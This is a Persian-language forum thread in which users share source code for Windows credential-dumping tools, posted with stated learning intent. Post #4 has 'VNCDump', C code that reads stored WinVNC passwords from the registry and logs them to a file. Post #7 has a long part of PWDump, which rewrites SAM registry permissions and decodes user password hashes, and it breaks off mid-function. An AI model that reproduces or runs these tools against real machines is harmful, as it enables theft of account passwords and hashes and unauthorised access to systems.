    و مایکروسافت از ماهها پیش، Security Update مربوط به این Bug را منتشر کرده است: http://www.microsoft.com/security/bu...0409_jpeg.mspx
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    من این source رو برای آشنایی دوستان با روند کارکرد این exploit گذاشتم نه برای موارد دیگه.
    مورد بعد اینه که در 80% موارد، اول Bug توسط افرادی غیر از تیم مایکروسافت پیدا میشه، بعد مایکروسافت پچ میده؛ در این مورد هم به همین شکل بود. حالا من نفهمیدم جریان اون کلمه «ماهها پیش» که شما به کار بردین چه معنی میده !!!؟



  4. #4


    خواننده شناسه تصویری !!!!!!!!!!!!!!!

    VNCDump

    کد HTML:
    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    
    /*
     * Reads the WinVNC "Password" and "PortNumber" registry values and dumps
     * them as hex, both to stdout and (appended) to vnclog.txt in the current
     * directory.
     *
     * Two locations are read, in this order:
     *   HKEY_CURRENT_USER\SOFTWARE\ORL\WinVNC3
     *   HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
     *
     * argc/argv are not used. Nothing is returned (void main).
     *
     * Defensive reading of this listing: the stored password value is plain
     * registry data that any process able to open these keys can copy, so
     * the controls that matter are the ACLs on the two keys and monitoring
     * for reads of them or for the vnclog.txt artefact.
     * NOTE(review): how WinVNC protects the stored value is not shown here.
     */
    void main(int argc,char *argv[])
    {
    	HKEY key;
    	HKEY key2;
    	unsigned char buffer[8];
    	unsigned char buffer2[8];
    	unsigned char port[16];
    	unsigned char port2[32];
    	unsigned long PSize2 = sizeof(port2);
    	unsigned long PSize = sizeof(port);
    	unsigned long size = sizeof(buffer);
    	unsigned long size2 = sizeof(buffer2);
    	printf("\tVNCDump By KD-Team\n");
    	FILE *VFile;
    	/* NOTE(review): the fopen result is never checked for NULL. */
    	VFile = fopen("vnclog.txt","a+");
    	/* KEY_ALL_ACCESS is requested although the key is only read below. */
    	if(ERROR_SUCCESS == RegOpenKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\ORL\\WinVNC3",0,KEY_ALL_ACCESS,&key))
    	{
    		printf("Opening Key \"HKCU\" succeded\n");
    		printf("Handle: %i\n",key);
    	}
    	else
    	{
    		/* NOTE(review): key was never assigned on this path, yet it is
    		 * closed here and still passed to RegQueryValueEx below. */
    		printf("Opening Key Failed\n");
    		RegCloseKey(key);
    	}
    
    	if(ERROR_SUCCESS == RegQueryValueEx(key,"Password",NULL,0,buffer,&size))//(LPBYTE)
    	{
    		printf("Quering Key succeded\n");
    		printf("HKCU Password\n");
    		fprintf(VFile,"%s","HKCU\n");
    		fprintf(VFile,"%s","Password: ");
    		/* Dumps all 8 bytes of the buffer, whatever length the query returned. */
    		for(int length = 0; length < sizeof(buffer); length++)
    		{
    			printf("%x", buffer[length]);
    			fprintf(VFile,"%x",buffer[length]);
    		}
    		fprintf(VFile,"%s","\n");
    		/* The in-memory copy is zeroed once it has been printed and logged. */
    		memset(&buffer,0,sizeof(buffer));
    		printf("\n");
    
    		if(ERROR_SUCCESS == RegQueryValueEx(key,"PortNumber",NULL,0,port,&PSize))//(LPBYTE)
    		{
    			printf("Quering Key succeded\n");
    			printf("HKCU PortNumber\n");
    			fprintf(VFile,"%s","HKCU\n");
    			fprintf(VFile,"%s","PortNumber: ");
    			/* Bytes are printed from index strlen(port) down to 0, i.e. in
    			 * reverse order and starting at the first zero byte. */
    			for(int length = strlen(port); length >= 0 ; length--)
    			{
    				printf("%x", port[length]);
    				fprintf(VFile,"%x",port[length]);
    			}
    			fprintf(VFile,"%s","\n");
    			fclose(VFile);
    			RegCloseKey(key);
    		}
    		else
    		{
    			printf("Quering Key Failed\n");
    			RegCloseKey(key);
    		}
    	}
    	else
    	{
    		printf("Quering Key Failed\n");
    		RegCloseKey(key);
    	}
    //**********************************************************************************************************
    	/* Same sequence again for the machine-wide key. NOTE(review): the log
    	 * file is reopened here even on paths where the first handle was
    	 * never closed. */
    	VFile = fopen("vnclog.txt","a+");
    	if(ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\ORL\\WinVNC3\\Default",0,KEY_ALL_ACCESS,&key2))
    	{
    		printf("\nOpening Key \"HKLM\" succeded\n");
    		printf("Handle: %i\n",key2);
    	}
    	else
    	{
    		printf("Opening Key Failed\n");
    		RegCloseKey(key2);
    	}
    
    	if(ERROR_SUCCESS == RegQueryValueEx(key2,"Password",NULL,0,buffer2,&size2))//(LPBYTE)
    	{
    		printf("Quering Key succeded\n");
    		printf("HKLM Password\n");
    		fprintf(VFile,"%s","HKLM\n");
    		fprintf(VFile,"%s","Password: ");
    		for(int length2 = 0; length2 < sizeof(buffer2); length2++)
    		{
    			printf("%x", buffer2[length2]);
    			fprintf(VFile,"%x",buffer2[length2]);
    		}
    		fprintf(VFile,"%s","\n");
    		memset(&buffer2,0,sizeof(buffer2));
    		printf("\n");
    		if(ERROR_SUCCESS == RegQueryValueEx(key2,"PortNumber",NULL,0,port2,&PSize2))//(LPBYTE)
    		{
    			printf("Quering Key succeded\n");
    			printf("HKLM PortNumber\n");
    			fprintf(VFile,"%s","HKLM\n");
    			fprintf(VFile,"%s","PortNumber: ");
    			for(int length2 = strlen(port2); length2 >= 0 ; length2--)
    			{
    				printf("%x", port2[length2]);
    				fprintf(VFile,"%x",port2[length2]);
    			}
    			fprintf(VFile,"%s","\n");
    			fclose(VFile);
    			RegCloseKey(key2);
    		}
    		else
    		{
    			printf("Quering Key Failed\n");
    			RegCloseKey(key2);
    		}
    	}
    	else
    	{
    		printf("Quering Key Failed\n");
    		RegCloseKey(key2);
    	}
    }


    کوروش جان نظری داری بگو !

    ( یکی اسم این ترد رو عوض کنه ! )



  5. #5
    نام حقيقي: محمد رسول راستی

    مدیر عمومی شناسه تصویری M-r-r
    بابا بیخیال . . .
    زشته . . .
    قباحت داره . . .
    . . .
    .


    Mohammad Rasoul Rasti
    There's no place like 127.0.0.1
    m.rasti [@] outlook.com

  6. #6
    نام حقيقي: محمد حکیمی

    Administrator شناسه تصویری Hakimi
    من هدفت از نوشتنش را نمی دانستم. کاش قبل تر می نوشتی. من تصور کردم به عنوان یک خبر این موضوع را نوشتی و نه برای یادگیری.
    خیلی عالی است که در مورد این Bug ها تحقیق کنیم
    و اما : درست است که توسط دیگران کشف می شود و بعد Microsoft برای رفع مشکل Patch و HotFix صادر می کند، ولی در اکثر موارد پیش از این که این Bug ها به صورت عمومی اعلام شوند، Patch ها و HotFix هایشان منتشر می شود. اگر به موقع سیستم عامل را Update کنیم در اکثر موارد می توانیم با خیال راحت زندگی کنیم!

    راستی اسم این Threadرا چه بگذاریم؟!
    فکر کنم اگر این Thread به همین صورت ادامه یابد یکی از پر خواننده ترین Thread ها شود من که شخصا خیلی علاقه مندم.

    Source من برای این گونه موارد astalavista.com است. معمولا این گونه Exploit ها در AstalaVista منتشر می شوند.

    باز هم ممنون.

    (حالا من متوجه منظور محمد رسول نشدم!)



  7. #7


    خواننده شناسه تصویری !!!!!!!!!!!!!!!

    Icon10 PWDump

    کد HTML:
    /*
     * (C) Jeremy Allison 1997. #All rights reserved.#i
     * 
     * This program is free for commercial and non-commercial use.
     *
     * Redistribution and use in source and binary forms, with or without
     * modification, are permitted.
     *
     * THIS SOFTWARE IS PROVIDED BY JEREMY ALLISON ``AS IS'' AND
     * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
     * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
     * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
     * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
     * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
     * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
     * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
     * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
     * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
     * SUCH DAMAGE.
     *
     */
    
    #include <windows.h>
    #include <string.h>
    #include <stdlib.h>
    #include <stdio.h>
    
    #include "des.h"
    
    /*
     * Program to dump the Lanman and NT MD4 hashed passwords from
     * an NT SAM database into a Samba smbpasswd file. Needs Administrator
     * privileges to run.
     * Takes one arg - the name of the machine whose SAM database you
     * wish to dump. If this arg is not given, it dumps the local machine
     * account database.
     */
    
    /*
     * Convert system error to char. Returns 
     * memory allocated with LocalAlloc.
     */
    
    /*
     * Look up the system message text for a Win32 error code.
     *
     * error: the error code to translate.
     *
     * Returns the message in a buffer that FormatMessage allocated
     * (FORMAT_MESSAGE_ALLOCATE_BUFFER), or 0 when FormatMessage reports
     * failure by returning 0.
     */
    char *error_to_string(DWORD error)
    {
      char *text;
      DWORD written;

      /* With ALLOCATE_BUFFER the API stores the new buffer's address through
       * the pointer argument, hence the cast of &text. */
      written = FormatMessage(
          FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
          NULL,
          error,
          MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), /* Default language */
          (char *)&text,
          0,
          NULL);

      return (written != 0) ? text : 0;
    }
    
    /*
     * Return a pointer to a string describing an os error.
     * error_to_string returns a pointer to LocalAlloc'ed
     * memory. Cache it and release when the next one is
     * requested.
     */
    
    /*
     * Describe an OS error as text, keeping ownership of the buffer.
     *
     * The most recent message is held in a function-local static; each call
     * releases the previous one with LocalFree before fetching the next, so a
     * returned pointer is only good until the following call.
     *
     * err: the error code to describe.
     *
     * Returns whatever error_to_string() returned, which is 0 when the
     * message lookup failed.
     */
    char *str_oserr(DWORD err)
    {
      static char *cached = 0;

      if(cached != 0)
        LocalFree((HLOCAL)cached);

      return cached = error_to_string(err);
    }
    
    /*
     * Utility function to allocate a SID from a name.
     * Looks on the local machine. The SID is allocated with LocalAlloc
     * and must be freed by the caller.
     * Returns TRUE on success, FALSE on failure.
     */
    
    /*
     * Resolve an account name to a SID.
     *
     * name:  account name to look up (the system-name argument passed to
     *        LookupAccountName is 0).
     * ppsid: receives a LocalAlloc'ed SID on success and is set to 0 on every
     *        failure path; on success the caller releases it with LocalFree.
     *
     * Returns TRUE on success, FALSE after printing a diagnostic to stderr.
     */
    BOOL get_sid(const char *name, SID **ppsid)
    {
      SID_NAME_USE use_kind;
      DWORD sid_bytes = 0;
      DWORD domain_len = 0;
      char *domain_buf;
      BOOL found;

      *ppsid = 0;

      /* First call passes no buffers and is only there to learn the sizes;
       * ERROR_INSUFFICIENT_BUFFER is the expected outcome. */
      if(!LookupAccountName(0, name, 0, &sid_bytes, 0, &domain_len, &use_kind)
         && GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
        fprintf( stderr, "get_sid: LookupAccountName for size on name %s failed. Error was %s\n",
              name, str_oserr(GetLastError()));
        return FALSE;
      }

      *ppsid = (SID *)LocalAlloc( LMEM_FIXED, sid_bytes);
      domain_buf = (char *)LocalAlloc( LMEM_FIXED, domain_len);
      if( *ppsid == 0 || domain_buf == 0) {
        fprintf( stderr, "get_sid: LocalAlloc failed. Error was %s\n",
                     str_oserr(GetLastError()));
        /* Release whichever of the two allocations did succeed. */
        if(*ppsid)
          LocalFree((HLOCAL)*ppsid);
        if(domain_buf)
          LocalFree((HLOCAL)domain_buf);
        *ppsid = 0;
        return FALSE;
      }

      /* Second call fills the buffers sized by the first. */
      found = LookupAccountName(0, name, *ppsid, &sid_bytes, domain_buf, &domain_len, &use_kind) != 0;
      if(!found) {
        fprintf( stderr, 
             "get_sid: LookupAccountName failed for name %s. Error was %s\n",
             name, str_oserr(GetLastError()));
        LocalFree((HLOCAL)*ppsid);
        *ppsid = 0;
      }

      /* The domain name is never handed back, so it is freed on both paths. */
      LocalFree((HLOCAL)domain_buf);
      return found ? TRUE : FALSE;
    }
    
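    /*
     * Build a security descriptor whose DACL holds one access-allowed ACE
     * per (char *name, DWORD access mask) pair in the varargs list.
     *
     *   sdout - descriptor to initialise.
     *   num   - number of name/mask pairs that follow; must be positive.
     *
     * The ACL is allocated with LocalAlloc and, on success, is referenced
     * by sdout; it must be freed by the caller once sdout is no longer used.
     * Returns TRUE on success, FALSE on fail (everything allocated here is
     * released on the failure path).
     */
    
    BOOL create_sd_from_list( SECURITY_DESCRIPTOR *sdout, int num, ...)
    {
      va_list ap;
      SID **sids = 0;
      char *name;
      DWORD amask;
      DWORD acl_size;
      PACL pacl = 0;
      int i;
    
      /* Zero entries would yield an empty DACL (which grants nobody access)
         and a negative count would corrupt the size arithmetic below. */
      if(num <= 0) {
        fprintf(stderr, "create_sd_from_list: invalid entry count.\n");
        return FALSE;
      }
    
      /* calloc leaves every slot 0, which the cleanup loops rely on. */
      if((sids = (SID **)calloc((size_t)num, sizeof(SID *))) == 0) {
        fprintf(stderr, "create_sd_from_list: calloc fail.\n");
        return FALSE;
      }
    
      /* Upper bound for the ACL: fixed per-entry overhead here, the SID
         lengths are added as they are resolved. */
      acl_size = num * (sizeof(ACL) +
                 sizeof(ACCESS_ALLOWED_ACE) +
                 sizeof(DWORD));
    
      /* Collect all the SID's */
      va_start( ap, num);
      for( i = 0; i < num; i++) {
        name = va_arg( ap, char *);
        (void)va_arg( ap, DWORD);   /* mask is not needed in this pass */
        if(get_sid( name, &sids[i]) == FALSE) {
          va_end(ap);               /* every va_start needs its va_end */
          goto cleanup;
        }
        acl_size += GetLengthSid(sids[i]);
      }
      va_end(ap);
    
      if((pacl = (PACL)LocalAlloc( LMEM_FIXED, acl_size)) == 0) {
        fprintf( stderr, "create_sd_from_list: LocalAlloc fail. Error was %s\n",
                str_oserr(GetLastError()));
        goto cleanup;
      }
    
      if(InitializeSecurityDescriptor( sdout, SECURITY_DESCRIPTOR_REVISION) == FALSE) {
        fprintf( stderr, "create_sd_from_list: InitializeSecurityDescriptor fail. Error was %s\n",
                     str_oserr(GetLastError()));
        goto cleanup;
      }
      if(InitializeAcl( pacl, acl_size, ACL_REVISION) == FALSE) {
        fprintf( stderr, "create_sd_from_list: InitializeAcl fail. Error was %s\n",
                     str_oserr(GetLastError()));
        goto cleanup;
      }
    
      /* Second pass over the arguments: this time only the masks matter. */
      va_start(ap, num);
      for( i = 0; i < num; i++) {
        ACE_HEADER *ace_p;
        (void)va_arg( ap, char *);
        amask = va_arg( ap, DWORD);
        if(AddAccessAllowedAce( pacl, ACL_REVISION, amask, sids[i]) == FALSE) {
          fprintf( stderr, "create_sd_from_list: AddAccessAllowedAce fail. Error was %s\n",
                     str_oserr(GetLastError()));
          va_end(ap);
          goto cleanup;
        }
        /* Make sure the ACE is inheritable */
        /* NOTE(review): the ACE index passed here is always 0, so on every
           iteration it is the first ACE that gets the inherit flags, not the
           one just added. Left as-is because changing it alters the DACL
           that ends up on the registry keys - confirm the intent first. */
        if(GetAce( pacl, 0, (LPVOID *)&ace_p) == FALSE) {
          fprintf( stderr, "create_sd_from_list: GetAce fail. Error was %s\n",
                     str_oserr(GetLastError()));
          va_end(ap);
          goto cleanup;
        }
        ace_p->AceFlags |= ( CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE);
      }
      va_end(ap);
    
      /* Add the ACL into the sd. */
      if(SetSecurityDescriptorDacl( sdout, TRUE, pacl, FALSE) == FALSE) {
        fprintf( stderr, "create_sd_from_list: SetSecurityDescriptorDacl fail. Error was %s\n",
                   str_oserr(GetLastError()));
        goto cleanup;
      }
    
      /* The SIDs were copied into the ACEs; only the ACL has to outlive us. */
      for( i = 0; i < num; i++)
        if(sids[i] != 0)
          LocalFree((HLOCAL)sids[i]);
      free(sids);
    
      return TRUE;
    
    cleanup:
    
      if(sids != 0) {
        for( i = 0; i < num; i++)
          if(sids[i] != 0)
            LocalFree((HLOCAL)sids[i]);
        free(sids);
      }
      if(pacl != 0)
        LocalFree((HLOCAL)pacl);
      return FALSE;
    }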
    
    /*
     * Apply one security descriptor (DACL only) to every subkey of
     * start\path. In this file the path is the SAM Users key, so each
     * subkey is a user entry.
     *
     *   start      - root key the path is relative to.
     *   path       - key whose subkeys are enumerated.
     *   psd        - descriptor handed to RegSetKeySecurity.
     *   return_key - if non-null and the call succeeds, receives the open
     *                handle for start\path (opened for enumeration only);
     *                the caller then owns it. If null the handle is closed.
     *
     * Returns 0 on success, -1 on fail. The previous DACL of each subkey
     * is overwritten, not saved.
     */
    
    int set_userkeys_security( HKEY start, const char *path, SECURITY_DESCRIPTOR *psd, 
    						  HKEY *return_key)
    {
    	HKEY parent;
    	DWORD err;
    	char subname[128];
    	DWORD next = 0;
    
    	err = RegOpenKeyEx( start, path, 0, KEY_ENUMERATE_SUB_KEYS, &parent);
    	if(err != ERROR_SUCCESS) {
    		fprintf(stderr, "set_userkeys_security: Failed to open key %s to enumerate. \
    Error was %s.\n",
    				    path, str_oserr(err));
    		return -1;
    	}
    
    	/* Walk the subkeys by index until the enumeration stops. */
    	for(;;) {
    		DWORD size = sizeof(subname);
    		FILETIME ft;
    		HKEY child;
    
    		err = RegEnumKeyEx( parent, next, subname, &size, 0, 0, 0, &ft);
    		if(err != ERROR_SUCCESS)
    			break;
    		next++;
    
    		/* WRITE_DAC is the only right needed to replace the DACL. */
    		err = RegOpenKeyEx( parent, subname, 0, WRITE_DAC, &child);
    		if(err != ERROR_SUCCESS) {
    			fprintf(stderr, "set_userkeys_security: Failed to open key %s to set security. \
    Error was %s.\n",
    					subname, str_oserr(err));
    			RegCloseKey(parent);
    			return -1;
    		}
    
    		err = RegSetKeySecurity( child, DACL_SECURITY_INFORMATION, psd);
    		if(err != ERROR_SUCCESS) {
    			fprintf(stderr, "set_userkeys_security: Failed to set security on key %s. \
    Error was %s.\n",
    					subname, str_oserr(err));
    			RegCloseKey(child);
    			RegCloseKey(parent);
    			return -1;
    		}
    		RegCloseKey(child);
    	}
    
    	/* Anything other than "no more items" means the walk was cut short. */
    	if(err != ERROR_NO_MORE_ITEMS) {
    		RegCloseKey(parent);
    		return -1;
    	}
    
    	if(return_key != 0)
    		*return_key = parent;
    	else
    		RegCloseKey(parent);
    	return 0;
    }
    
    /*
     * Walk SECURITY\SAM\Domains\Account\Users and its parent keys and put
     * a fixed DACL on them: SYSTEM gets GENERIC_ALL, Administrators gets
     * WRITE_DAC | READ_CONTROL. The user subkeys are done first, then each
     * key from the Users key up to the first path component.
     *
     * Note that this writes a hard-coded descriptor; the DACL that was on
     * the keys before the program ran is never read or saved, so "restore"
     * means "set to this fixed value".
     *
     * Returns 0 on success. -1 on fail.
     */
    
    int restore_sam_tree_access( HKEY start )
    {
    	char path[128];
    	char *last_sep;
    	HKEY key;
    	DWORD err;
    	SECURITY_DESCRIPTOR sd;
    	DWORD admin_mask = WRITE_DAC | READ_CONTROL;
    
    	if(create_sd_from_list( &sd, 2, "SYSTEM", GENERIC_ALL,
    							"Administrators", admin_mask) == FALSE)
    		return -1;
    
    	strcpy( path, "SECURITY\\SAM\\Domains\\Account\\Users");
    
    	/* User subkeys first, while the parent is still reachable. */
    	if(set_userkeys_security( start, path, &sd, 0) != 0)
    		return -1;
    
    	/* Then the path itself, dropping one trailing component per pass. */
    	for(;;) {
    		err = RegOpenKeyEx( start, path, 0, WRITE_DAC, &key);
    		if(err != ERROR_SUCCESS) {
    			fprintf(stderr, "restore_sam_tree_access:Failed to open key %s to set \
    security. Error was %s.\n",
    					path, str_oserr(err));
    			return -1;
    		}
    
    		err = RegSetKeySecurity( key, DACL_SECURITY_INFORMATION, &sd);
    		if(err != ERROR_SUCCESS) {
    			fprintf(stderr, "restore_sam_tree_access: Failed to set security on key %s. \
    Error was %s.\n",
    					path, str_oserr(err));
    			RegCloseKey(key);
    			return  -1;
    		}
    		RegCloseKey(key);
    
    		last_sep = strrchr(path, '\\');
    		if(last_sep == 0)
    			break;          /* that was the top-most component */
    		*last_sep = 0;
    	}
    
    	return 0;
    }
    
    /*
     * Walk down SECURITY\SAM\Domains\Account\Users one component at a time
     * and replace the DACL on each key so that SYSTEM has GENERIC_ALL and
     * Administrators has WRITE_DAC | READ_CONTROL | KEY_QUERY_VALUE |
     * KEY_ENUMERATE_SUB_KEYS, then do the same for every user subkey.
     *
     *   start      - root key the path is relative to.
     *   return_key - if non-null, receives the open Users key on success
     *                (caller closes it); if null the key is closed here.
     *
     * Each step overwrites the key's DACL through RegSetKeySecurity; the
     * earlier DACL is not saved.
     *
     * Returns 0 on success. -1 on fail if no security was changed,
     * -2 on fail if security was changed.
     */
    
    int set_sam_tree_access( HKEY start, HKEY *return_key)
    {
    	char path[128];
    	char *sep;
    	HKEY key;
    	DWORD err;
    	BOOL changed = FALSE;
    	BOOL done = FALSE;
    	SECURITY_DESCRIPTOR sd;
    	DWORD admin_mask = WRITE_DAC | READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS;
    
    	if(create_sd_from_list( &sd, 2, "SYSTEM", GENERIC_ALL,
    							"Administrators", admin_mask) == FALSE)
    		return -1;
    
    	strcpy( path, "SECURITY\\SAM\\Domains\\Account\\Users");
    	sep = strchr(path, '\\');
    
    	while( !done ) {
    		/* Temporarily cut the path at the current separator so that
    		   only the leading components are opened; with no separator
    		   left the full path is processed and the walk ends. */
    		if( sep == 0)
    			done = TRUE;
    		else
    			*sep = 0;
    
    		err = RegOpenKeyEx( start, path, 0, WRITE_DAC, &key);
    		if(err != ERROR_SUCCESS) {
    			fprintf(stderr, "set_sam_tree_access:Failed to open key %s to set \
    security. Error was %s.\n",
    					path, str_oserr(err));
    			return (changed ? -2: -1);
    		}
    
    		err = RegSetKeySecurity( key, DACL_SECURITY_INFORMATION, &sd);
    		if(err != ERROR_SUCCESS) {
    			fprintf(stderr, "set_sam_tree_access: Failed to set security on key %s. \
    Error was %s.\n",
    					path, str_oserr(err));
    			RegCloseKey(key);
    			return (changed ? -2: -1);
    		}
    		changed = TRUE;
    		RegCloseKey(key);
    
    		/* Put the separator back and look for the next one. */
    		if(sep != 0) {
    			*sep++ = '\\';
    			sep = strchr(sep, '\\');
    		}
    	}
    
    	/* path is whole again here; now the per-user subkeys. */
    	if(set_userkeys_security( start, path, &sd, &key) != 0)
    		return -2;
    
    	if(return_key != 0)
    		*return_key = key;
    	else
    		RegCloseKey(key);
    	return 0;
    }
    
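    /* 
     * Read a little-endian 32-bit value from the first four bytes of
     * array and return it as an int.
     *
     * The bytes are read as unsigned char and combined in unsigned
     * arithmetic: plain char may be signed, and left-shifting a negative
     * value (a byte >= 0x80 in the top position) is undefined behaviour.
     * The caller must make sure four bytes are readable at array.
     */
    
    int get_int( char *array )
    {
    	const unsigned char *b = (const unsigned char *)array;
    	unsigned int value;
    
    	value = (unsigned int)b[0]
    	      | ((unsigned int)b[1] << 8)
    	      | ((unsigned int)b[2] << 16)
    	      | ((unsigned int)b[3] << 24);
    
    	return (int)value;
    }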
    
    /*
     * Expand 7 input bytes (56 bits) into an 8 byte DES key: each output
     * byte carries 7 consecutive input bits in its upper bits, and
     * des_set_odd_parity() then fixes up the low (parity) bit.
     */
    
    void str_to_key(unsigned char *str,unsigned char *key)
    {
    	void des_set_odd_parity(des_cblock *);
    	int n = 0;
    
    	/* Pass 1: slice the 56 input bits into eight 7-bit groups. */
    	key[0] = str[0] >> 1;
    	key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
    	key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
    	key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
    	key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
    	key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
    	key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
    	key[7] = str[6] & 0x7F;
    
    	/* Pass 2: move each group up by one, freeing bit 0 for parity. */
    	while (n < 8) {
    		key[n] = (key[n] << 1);
    		n++;
    	}
    
    	des_set_odd_parity((des_cblock *)key);
    }
    
    /*
     * Derive the first DES key from the RID. The 7 byte seed is the four
     * RID bytes, least significant first, followed by the first three of
     * them again; str_to_key() turns the seed into the 8 byte key.
     */
    
    void sid_to_key1(unsigned long sid,unsigned char deskey[8])
    {
    	unsigned char seed[7];
    	int n;
    
    	/* seed[0..3] = RID bytes 0,1,2,3 */
    	for (n = 0; n < 4; n++)
    		seed[n] = (unsigned char)((sid >> (8 * n)) & 0xFF);
    	/* seed[4..6] repeats seed[0..2] */
    	for (n = 0; n < 3; n++)
    		seed[4 + n] = seed[n];
    
    	str_to_key(seed,deskey);
    }
    
    /*
     * Derive the second DES key from the RID. Same scheme as the first
     * key but the RID bytes are taken in the order 3,0,1,2 before the
     * first three seed bytes are repeated.
     */
    
    void sid_to_key2(unsigned long sid,unsigned char deskey[8])
    {
    	unsigned char seed[7];
    	int n;
    
    	seed[0] = (unsigned char)((sid >> 24) & 0xFF);
    	/* seed[1..3] = RID bytes 0,1,2 */
    	for (n = 0; n < 3; n++)
    		seed[1 + n] = (unsigned char)((sid >> (8 * n)) & 0xFF);
    	/* seed[4..6] repeats seed[0..2] */
    	for (n = 0; n < 3; n++)
    		seed[4 + n] = seed[n];
    
    	str_to_key(seed,deskey);
    }
    
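    /*
     * Range check for one variable-length field of a 'V' record.
     * offset and len are the raw values from the record header (offset is
     * relative to the data area); data_size is the size of the data area.
     * Returns non-zero when the field lies completely inside the record.
     */
    static int vp_field_ok(int offset, int len, int data_size)
    {
    	return offset >= 0 && len >= 0 &&
    		   len <= data_size && offset <= data_size - len;
    }
    
    /*
     * Copy one wide-character field out of the record's data area into a
     * freshly malloc'ed, NUL-terminated narrow string. Returns 0 when the
     * allocation fails. The caller has already range-checked offset/len.
     */
    static char *vp_copy_field(const char *data, int offset, int len)
    {
    	size_t nchars = (size_t)len / sizeof(wchar_t);
    	char *out = (char *)malloc((size_t)len + 1);
    
    	if(out == 0)
    		return 0;
    	/* On a conversion error the buffer contents are indeterminate, so
    	   hand back an empty string instead of whatever was written. */
    	if(wcstombs( out, (const wchar_t *)(data + offset), nchars) == (size_t)-1)
    		out[0] = 0;
    	out[nchars] = 0;
    	return out;
    }
    
    /*
     * Function to split a 'V' entry into a users name, passwords and comment.
     *
     *   vp, vp_size - the raw 'V' value and its size in bytes.
     *   username, fullname, comment, homedir
     *               - receive malloc'ed strings on success (caller frees);
     *                 all four are 0 when -1 is returned.
     *   lanman, md4 - 16 byte output buffers for the two hashes.
     *   got_lanman, got_md4
     *               - 1 if the hash was written, 0 if the record holds no
     *                 password data, -1 if the password area is too short
     *                 to hold both hashes.
     *   rid         - the account RID; both DES keys are derived from it.
     *
     * Returns 0 on success, -1 if the record is malformed or memory runs out.
     *
     * The header values come straight from registry data, so every offset
     * and length is checked against vp_size before it is used; without that
     * a corrupt or hostile record makes the copies below read outside vp.
     *
     * The two DES keys depend on nothing but the RID, so this layer is not
     * a secret: whoever can read the 'V' value can undo it. What protects
     * the stored hashes is the access control on the SAM keys.
     */
    
    int check_vp(char *vp, int vp_size, char **username, char **fullname,
    			 char **comment, char **homedir,
    			 char *lanman,int *got_lanman,
    			 char *md4,  int *got_md4,
    			 DWORD rid
    			 )
    {
    	des_key_schedule ks1, ks2;
    	des_cblock deskey1, deskey2;
    	int username_offset, username_len;
    	int fullname_offset, fullname_len;
    	int comment_offset, comment_len;
    	int homedir_offset, homedir_len;
    	int pw_offset;
    	int data_size;
    	char *data;
    	char *pw;
    
    	*username = 0;
    	*fullname = 0;
    	*comment = 0;
    	*homedir = 0;
    	*got_lanman = 0;
    	*got_md4 = 0;
    
    	/* The fixed header is read up to offset 0x9c + 4 and the variable
    	   data starts at 0xCC; anything shorter cannot be parsed. */
    	if(vp == 0 || vp_size < 0xCC)
    		return -1;
    	data = vp + 0xCC;
    	data_size = vp_size - 0xCC;
    
    	username_offset = get_int(vp + 0xC);
    	username_len = get_int(vp + 0x10);
    	fullname_offset = get_int(vp + 0x18);
    	fullname_len = get_int(vp + 0x1c);
    	comment_offset = get_int(vp + 0x24);
    	comment_len = get_int(vp + 0x28);
    	homedir_offset = get_int(vp + 0x48);
    	homedir_len = get_int(vp + 0x4c);
    	pw_offset = get_int(vp + 0x9c);
    
    	if(!vp_field_ok(username_offset, username_len, data_size) ||
    	   !vp_field_ok(fullname_offset, fullname_len, data_size) ||
    	   !vp_field_ok(comment_offset, comment_len, data_size) ||
    	   !vp_field_ok(homedir_offset, homedir_len, data_size) ||
    	   pw_offset < 0)
    		return -1;
    
    	if((*username = vp_copy_field(data, username_offset, username_len)) == 0) {
    		fprintf(stderr, "check_vp: malloc fail for username.\n");
    		goto fail;
    	}
    	if((*fullname = vp_copy_field(data, fullname_offset, fullname_len)) == 0) {
    		fprintf(stderr, "check_vp: malloc fail for fullname.\n");
    		goto fail;
    	}
    	if((*comment = vp_copy_field(data, comment_offset, comment_len)) == 0) {
    		fprintf(stderr, "check_vp: malloc fail for comment.\n");
    		goto fail;
    	}
    	if((*homedir = vp_copy_field(data, homedir_offset, homedir_len)) == 0) {
    		fprintf(stderr, "check_vp: malloc fail for homedir.\n");
    		goto fail;
    	}
    
    	if(pw_offset >= data_size) {
    		/* No password */
    		*got_lanman = 0;
    		*got_md4 = 0;
    		return 0;
    	}
    
    	/* Check that the password offset plus the size of the
    	   lanman and md4 hashes fits within the V record. Written as a
    	   subtraction so that a huge offset cannot overflow the sum. */
    	if(data_size - pw_offset < 32) {
    		/* Account disabled ? */
    		*got_lanman = -1;
    		*got_md4 = -1;
    		return 0;
    	}
    
    	/* Get the two decrypt keys. */
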